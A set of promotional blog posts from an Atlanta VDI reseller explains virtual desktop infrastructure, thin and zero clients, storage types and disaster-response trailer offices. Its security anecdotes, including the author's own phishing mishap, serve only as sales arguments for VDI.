So what is VDI?

VDI, or Virtual Desktop Infrastructure represents the future in changes to companies or institution’s networks, that reflect the need for the IT department to control, manage and reduce the operating expenses of running the data networks. Simply put, it replaces the standard desktop PC model, a physical PC on every desk, with a small box that transfers the work from the traditional, support intensive PC, to the server room or data center.

Why? Because it takes an enormous effort to support each computer on users desks, so VDI moves that experience from software running on those desktop PCs to the data center. It’s clean, simple and inexpensive. This graphic clearly shows the advantages.

The users don’t know that their PCs have moved if done properly, it just works after a normal login and the users continues to use their desktop peripherals as normal. The desktop PCs are replaced with zero or thin clients called endpoints, or even repurposed older XP PCs all of which allow the user to use the “PC” located elsewhere. The, normally loafing, super servers in the data center now have something to do all the time so the IT managers finally get their money’s worth out of these machines.

The biggest requirements in today’s IT Network infrastructure are to:

• Cut hardware costs
• Reduce administration
• Reduce energy consumption
• Improve security

Watch this video from one of our vendors. We generally recommend VMware, Citrix Xen, Parallels Virtuozzo or a Linux foundation to VDI. This 4 minute clip will help you understand VDI.

Another video illustrating the power of VDI -

From Wow to How – Watch this and be amazed!

Yes, it’s true. It’s almost 100% certain that a hacker or two has got past all of your sophisticated firewalls, AV screening systems and whatever intrusion systems you have and is poking around your corporate network.

Let’s start with a story from the Trojan wars, aptly named in this instance. About 3,000 years ago, according to Greek mythology the Greeks waged a fruitless war against the Trojans who used (firewalls and AV systems) boiling oil, bows and arrows and so on to stop the Greek intruders who tried to break down the walls of Troy without success. Finally the Greeks built a wooden horse, secreted 30 men inside and left it outside the gates of Troy. The Greeks pretended to sail away, and the Trojans towed the horse into the city as a victory homage.

You know the rest of the story. The Greeks left the horse at night, opened the gates and the Greeks took Troy.

That’s also what happened to your network. Your Trojan horse(s) are the laptop users who take their notebooks home and to coffee shops and hotels. They work on them, become infected and then take the Trojan Horses back to work. Once inside your heavily protected walls of your outer defenses, the malware starts infecting everything… and you probably have no idea what’s going on.

The solution, other than doing regular sweeps of your entire network, which won’t catch everything, is to use VDI.

As the users of VDI know, XP or Windows 7 is displayed in a browser window and isn’t on the host PC laptop. The actual software operating systems and applications never leaves your fortress so nothing gets in. Laptop users can still use their “office PC” except it’s through their browser. It’s a similar concept to using Gmail. You can write and read emails on it through your browser, but you don’t own or control the software. It resides on Google’s servers so you can’t hack the underlying software.

It’s simple and it works.

Here’s an example of how it’s done – http://searchsecurity.techtarget.com/news/1280089728/Russian-cybercriminal-steals-32M-from-US-government-with-Zeus-SpyEye-toolkit

I have to laugh. Just after writing my You’ve been hacked post, I actually fell for a phishing email a few days after I wrote it! Here’s the story…

We were thinking of changing our credit card processor and coincidentally I received an email from the provider asking for me to renew the yearly credit card agreement. I thought it would be good time to review the terms, so I got the user name and password and typed the credit card processing data entry web site into the browser. I looked around for the renewal link and didn’t see it so I logged out.

So far, so good.

For some reason, I committed the cardinal sin. I blindly clicked on the email web attachment which displayed the card processor’s login page again and tried to log in thinking (or really not thinking) that it was an associated site. It failed. I closed the browser and forgot about it… for about 30 seconds when a light-bulb lit up above my head!

I realized that the link was not actually a web link, but a path to the local html page. I realized that I had been phished and quickly went to another PC, logged to the processor, the correct way and changed the password. When I examined the underlying information in the attachment I found that our login credentials had been sent to Spain or wherever!

Fortunately I caught it immediately, and as very little information was viewable on the credit card website they couldn’t do much with the information unless it was a part of a bigger scheme.

So I was caught, after years of not trusting any web login page especially when it was supplied by email. I must have been asleep for a moment. That’s all it takes to compromise an entire network.

My PC was a VDI virtualized instance, so I could either roll it back to the day before the incident or generate a new copy from a gold instance. The first would take a few minutes, or just blow it away and use the second method to generate a brand new Windows 7 instance in five.

I picked the five minute method. We run Unidesk middleware that separates the operating system from the applications and personalization. It something like a layer cake’ we could remove the Windows 7 only, and slide in a new gold version. The applications and personalization stay the same.

In ten minutes my PC was back to the way it was without any chance that the error I made had also accidentally installing Trojans, viruses or other serious consequences in addition to getting our password.

Can you do that without a VDI network? I doubt it. Not a chance.

You have been warned, and your business network has almost certainly been hacked. They are stealing from you.

We work with a variety of VDI solutions – VMware View, Citrix XenDesktop, Quest vWorkspace, Pano Logic, 2X, Kaviza VDI-in-a-Box, Virtual Bridges VERDE, Red Hat Enterprise Virtualization for Desktops (RHEV) and others. We get the question all of the time… who’s the top gun in this category?

It depends… like everything else in life. That question can be answered based on price/performance, performance alone (depending on what’s meant by “performance”), the most robust experience, equipment in your data center, if you want a commercial data center to host it and many more.

Let’s focus on performance, dictated to a large part by the protocol used to move bytes around between the data center and the endpoint. If we only include the VDI endpoints that use a browser for the user to work in, either on a PC, Mac, think client or whatever then here’s the list based on our experience -

Top position – HDX, used by Citrix and Kaviza
Middle position – VMware View (PCoIP) and RedHat (developer SPICE), VERDE (open source SPICE)
A notch down – Quest (EOP) and 2X, RDP
The worst – none. They all have their pros and cons. Even the venerable RDP protocol works fine.

We have decided to setup a rolling series of demos on a test server in our office. Weeks 1-3 will be HDX, using Kaviza, the next three Red Hat, the following three, VERDE, and the final three, View. This is not a trivial task, as these builds take a lot of time and effort. But if you see VDI in action, you’ll become a believer.

We cannot demo Pano Logic as their elegant solution depends on a hardware endpoint, but the others will work fine in a browser. We don’t want to demo Quest as it’s an immensely complex  product and delicate. We like robust. I like to keep what hair I have left.

We can only entertain providing the DNS and user accounts to metro Atlanta prospective customers because -

1   We get so many hits on this website that our test server will grind to a halt as it’s only configured for twenty users at the same time, not a thousand.

2   We only have a 5Mbps uplink so we must restrict the number of active users.

3   We are a commercial business, so it’s a good way for us to prospect for Georgia business.

If you are a business (not a competitor) in Georgia interested in VDI, please email from your business account to us at vdidemo@atlantavdi.com and we’ll put you on the list.

How many times have you watched the news and seen a disaster unfolding with fire trucks, police cars and ambulances? Lots, right? And how many times have you seen a trailer towed to the scene so that the coordinators can provide onsite logistics to coordinate all of the emergency services? Never..  you’re right again but it will change.

It will change as Sprint has introduced its mobile convergence technology and we provide equipment to make use of it. Here’s how it works.

In a nutshell, Sprint installs mobile 4G using a directional antenna that’s pointed with a clear line of sight to one of their towers. A portable generator powers everything, including heat or A/C, so that the Sprint system provides a stable, very high speed Internet connection to the trailer. Inside the trailer will be thin or zero clients workstations attached to a single server that emulates PCs for every user. Next to the client will be a keyboard, monitor, mouse and VoIP (Voice over IP) phone system telephone with a simple virtualized software application (running in that single server) with auto-attendant, voice mail, call recording and every feature that a regular office would have.

The result… a preconfigured highly efficient “in the field” office in a box trailer, one that emergency services can use to save lives and coordinate emergency response at the scene and not from a remote location.

Libraries with Internet accessible computer networks are in an awkward position – they have to provide Internet access but must make sure that certain sites are blocked. The problem is that blocking them takes time and effort, and slip-ups occur. One of the remarkable fringe benefits of VDI and the required server running in the corner is that a firewall virtual appliance is both easy to install and self maintaining!

Let me describe how this works. As I’ve written before VMware, Citrix XenServer and Microsoft’s Hyper-V all boot the server and creates a volume or volumes where servers can be installed within the “host” or server. Those servers can be converted from a single physical server, be converted from another virtualized system (such as moving from XenServer to VMware ESX) or installed as an appliance. Appliance? What’s that?

An appliance is simply a complete server was created by someone else, and saved to a shared pool of appliances and that may be downloaded directly into the virtualized server for instant use. For example, the formerly Yahoo.com Zimbra, a competitor of Microsoft Exchange was sold to VMware and virtualized into an appliance. So if you have ten minutes to spares you can select and download the Zimbra appliance (http://www.zimbra.com/)  and having a running messaging server minutes thereafter! To reiterate, an appliance is (usually) a Linux file server software release such as Centos 5 and has a pre-installed piece of software such as Zimbra installed on it. It saves a great deal of time installing a server, and then the specialized software on top of it. So what does this have to do with libraries?

Lots… as I said they have to screen material electronically before the content gets to the endpoint – the libary computer user. The quickest and best way to do this is to install a gateway or filtering appliance such as Untangle (http://wiki.untangle.com/index.php/Untangle_Virtual_Appliance_on_VMware) or Astaro, (http://www.astaro.com/products/astaro-security-gateway-software-appliance) both excellent products. In a matter of minutes, either can be installed and activated. Not only that but they use the Internet to updates themselves every day automatically. Time and effort is money. It’s best to save time and money by installing an appliance and let it do the work itself.

How would you like to make your IT life easier? How would you like to be able to deploy specific applications to individuals, groups and any combination for up to 10,000 desktops with just a few clicks? And how about being able to remove some of those, or all, apps with a single click?

How would you like to not have to build dozens of gold images, each with a specific application set? But, instead build one, and add the application layers later?

Watch this space. Coming soon…

The boy scouts motto is “Be Prepared.” Fedearal Emergency Management Agency’s (FEMA) motto is similar, to prepare for disaster before it happens and stockpile whatevers necessary to deal with the disaster, quickly and as efficiently as possible. So how does VDI fit into this picture?

Nowadays, its vitial for FEMA or any organization that has to deal with the unexpected. One of the core methodologies is organization, and the key product in providing organization and detailed follow-through is by using computers. The problem FEMA has is moving personnel to a location and getting them up and running efficiently working to deal with a disaster. That can take days, or even weeks.  Enter Sprint 4G and VDI. Here’s how it works…

As you know, its fairly easy to establish a “network in a box,” a complete network of 20-100 Zero Client “end-points,” the desktop computer if you will, using a central server with master Windows XP or Windows 7 images that can be updated quickly with the latest software revisions or applications most useful to that disaster. And the new data convergence technology that Sprint (one of our business partners) has provide reliable 4G voice and data networks using a roof mounted parabolic antenna to provide these services.

So if they stock trailers with foldup desks built into the trailer walls, each with a Zero Client device and a Voice over IP, VoIP (http://en.wikipedia.org/wiki/Voice_over_Internet_Protocol) telephone, a virtual server in the corner with a generator ready to supply power for the network and A/C, and finally a roof mounted antenna and you have a complete, secure voice and data mobile office. Just tow, or fly smaller versions of these trailers into the disaster area and the FEMA specialists will have an instant phone and data networks to work on the problem… fast.

This can provide FEMA and similar organizations an efficient way to service a disaster or similar area and keep its employees working at peak efficiency.

It depends. Do you recall the soft drink commercials that somehow attempted to persuade us that zero calories made a significant difference from one calorie drinks? Well it’s not as meaningless as that, but Zero and Thin does provide some interesting comparisons to the big, old fat client of yesteryear. Let’s define the terms, without getting too technical.

The fat client is the standard PC or laptop. The operating system, applications and everything else is inside the single box, sitting on the employees desk.

The thin client has a whole range of products that meet these specs, but generally they are small boxes designed to replace the desktop PC by slimming down what is included in the box. Usually no hard drive, a simplified operating system, a BIOS, CPU, RAM and firmware to make it all work.

The idea is that the thin client uses the server to provide the desktop and application services that normally would take place on the PC and justs show the results. Depending on the types of applications used at that desk, they can be close to fat clients if they need to run applications such as CAD, PhotoShop or movie editing software, down to very skinny thin clients that have very little in them except a graphics adapter processor to show full screen YouTube or similar videos in additional to regular work.

On the other end of the spectrum, there is only one real Zero Client product, made by Pano Logic. Their cubes do not have a CPU, RAM, firmware or any of what makes the cubes a “PC.” They use a unique technology that actually produces an amazingly good experience for the end user and are very easy to manage.

It depends on what you want to accomplish. As you know, there are lots of PC manufacturers, but in the thin client market Wyse is the largest and best known player. It  has a wide array of products, including what they offer as a Zero Client. Is it? No quite, but close. As described above, only Pano Logic offer a true zero client.

When considering VDI there are five main pain points that company management has to deal with. I call them paint points, as management winces when they think about this stuff.

• Electricity – VDI solves the high power bill problem. You can run 50 VDI desktop devices for the same electricity use as 1 PC. Result, thousands of dollars a month saved in both electricity use and A/C savings.
• Management – Desktop PCs need lots of TLC. And TLC needs time and money. VDI devices need next to no maintenance.  Result, thousands of dollars a month saved in IT labor or consultant costs.
• Security – Desktop PCs are easily compromised, stolen or used for inappropriate activities. VDI devices can be easily locked down. Result, no lawsuits for company confidential information getting out.
• Viruses – Individual users like to install software and visit websites that infect not only their PC, but everyone else’s. It’s a constant cat and mouse challenge for IT management. VDI devices end the problem. If an instance of XP or Windows 7 is infected an entire new suite of “gold copy” Windows XP or Windows 7 software can be rolled out automatically overnight. As all user data is stored in a data storage device, only the operating system is recreated with the latest patches and A/V software… virus free. Result – dramatic reduction in IT maintenance work, updating each machine.
• Usability – Desktop PC operating system changes need user training so that user knows what to do when changeover occurs. VDI devices allow both XP and Windows 7 to be available on the same devices. Result – training is a gradual process so users can get used to the new Windows 7 without being traumatized by a single day switch over with weeks of expensive training.

When management thinks through how their current infrastructure addresses this points, compared to how well VDI handles them, they will think long and hard about evaluating VDI to see if these five points are easily dealt with by using VDI. It does, and it will.

Yes it does matter, but which one is best is dependant on the size of the network, how many physical servers or hosts as they tend be called today.

The simplest external storage is DAS, Direct Attached Storage. If you’re using external SATA drives, or eSATA (the same drives you may use internally, but kept outside of the physical server) this is a type of DAS. A DAS is when you have an external hard drive or two and a cable running into the server attached to one of the eSATA connectors.

The NAS is Network Attached Storage. The storage device is attached to the network with an Ethernet jack and typically accessed by a single server. A NAS is a single storage device that uses its own file system so a user can browse the NAS for files. Simply put, they are single purpose computers that users attached to, such as assigning a drive letter, which do nothing but provide access to stored data. It’s like a giant, storage drive separate from the servers. Compared to a SAN, a NAS is for lighter loads.

The SAN is on the other hand is a Storage Attached Network. It usually consists of a group of storage devices that work together and is designed to be used by multiple servers under heavy load. They have a high speed link (either fibre or iSCSI with very fast adapters) to those servers so data can be shared across the servers. That’s not to say that NAS isn’t similar, it is but SAN devices tend to be faster, better suited to being shared by multiple computers and more expensive of course.

In essence, a SAN is a storage device on the network that operate using disk blocks. This type of storage device appears to the users (via iSCSI, the most popular, or similar protocol) as a location on the file server where their data is stored, but is actually elsewhere on the network. If you have many servers that share data, use a SAN, just one, use a NAS.

As you know, the fable about the cobblers children is that the cobbler spent so much time repairing his customers’ shoes that he didn’t have time, or the inclination to provide them to his own children. So goes the Oak Ridge National Laboratory in Tennessee.

This federal facility, tasked with teaching other federal locations how to avoid being hacked, was…. you guess it, hacked. You can read about it here. Ignoring just how much public money is spent on our federal security façade, it lends a thought to securing your own network. There are many ways to protect your users from cyber attacks – anti-virus applications, anti spam programs, gateway security appliances, ongoing education about what not to click, why not to plug you USB stick into your office computer and so on.

But the real trick is layered security, a mix of all the above methods layered in such a way to create an electronic maze. A maze is usually described as a physical location that has passages leading to many dead ends, with only one passage leading to the exit on the other side. The plan is to navigate the maze so you find the one route to the exit without travelling a passage leading to a dead-end. The best example I can think of is the one at Hampton Court in England.

And like a maze, layering a variety of anti-malware dead-ends that a virus, Trojans, spam or other malware has to navigate is the best method to stop the end-user, and your company from having its data stolen. And if you think it won’t happen to you, look at the current story about Sony being hacked and having 70 million IDs stolen.

It can, and it likely will.

So how does VDI help? It’s easy. The Oak Ridge National Laboratory has many, many computers. And it only took one for the infection to take hold, which it did as that particular computer wasn’t quite up to date so the malware’s blind attempt to infect the PC worked. With VDI, a single image is carefully built, scanned, updated and made as anti-malware as possible and rolled out to all the users automatically. A thousand or more PCs is easy. And updates are easily applied to all users with a click of a button, not a thousand clicks and many, many desktop visits. No longer does IT have to update a thousand PCs, which is almost an impossible task but only one.

You want to stop malware in its tracks, think VDI.

You may think that your company is well suited to VDI and green computing. Take this survey and we’ll let you know.

How many PCs does your company have?customer surveys

How may employees do you need to support your network?Market Research